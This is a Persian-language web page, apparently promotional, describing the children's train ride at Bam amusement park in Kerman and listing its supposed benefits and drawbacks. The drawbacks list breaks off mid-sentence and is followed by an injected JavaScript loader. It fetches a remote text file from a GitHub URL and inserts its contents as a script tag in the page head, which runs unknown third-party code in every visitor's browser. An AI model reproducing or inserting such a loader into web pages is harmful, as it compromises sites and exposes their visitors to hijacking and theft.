قطارکودک در شهربازی ها

 • وسیله بازی قطارکودک یکی از وسایل محبوب و مهیج در شهربازی‌ها است. این وسیله شامل یک قطار کوچک با چند واگن است که در یک مسیر مشخص حرکت می‌کند. قطار کودکان معمولا برای سنین پایین طراحی شده و سرعت زیادی ندارد. اما برای کودکان، سوار شدن بر روی قطار و دیدن مناظر مختلف، یک تجربه لذت‌بخش و خاطره‌انگیز است.

  شهربازی بم یکی از شهربازی‌های معروف و بزرگ در استان کرمان است. این شهربازی در سال 1398 تاسیس شده و دارای وسایل بازی متنوع و جدیدی است. یکی از وسایل بازی این شهربازی، قطار کودکان است که در فضای روباز قرار دارد. قطارکودک دارای 4 واگن است که هر کدام 4 نفر را جای می‌دهد. قطار کودکان در شهربازی بم، در یک مسیر دایره‌ای با طول 100 متر حرکت می‌کند. این مسیر دارای مناظر زیبا و جذابی است که کودکان را شاد و خوشحال می‌کند. برخی از این مناظر عبارتند از: درختان، گل‌ها، حیوانات، تابلوهای رنگی و … . قطار کودکان در شهربازی بم، یکی از پرطرفدارترین وسایل بازی در این مجموعه است و همیشه صف زیادی برای سوار شدن بر روی آن وجود دارد.

  قطارکودک یک وسیله بازی جذاب و مفرح است که می‌تواند برای کودکان خاصیت آموزشی و تفریحی داشته باشد. برخی از مزایا و معایب این وسیله بازی عبارتند از:

  مزایا قطارکودک:

  افزایش هوش فضایی و توانایی مشاهده و تشخیص الگوها
  تقویت حافظه و تمرکز با دنبال کردن مسیر قطار
  توسعه خلاقیت و تخیل با ساختن مسیرهای مختلف و تزیین آنها
  ایجاد احساس شادی و هیجان با سوار شدن بر روی قطار و دیدن مناظر متنوع
  ارتقای مهارت‌های اجتماعی و همکاری با بازی گروهی و به اشتراک گذاری وسیله بازی
  معایب قطارکودک:

  نیاز به فضای کافی و امن برای نصب و استفاده از وسیله بازی
  هزینه بالا برای خرید و نگهداری وسیله بازی و باتری‌های آن
  احتمال بروز خطرات و آسیب‌های جسمی با برخورد با قطار یا ریل‌ها
  ایجاد سر و صدا و اختلال در آرامش خانواده و همسایه‌ها
  افزایش وابستگی و علاقه به بازی و کاهش وقت صرف شده برای

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید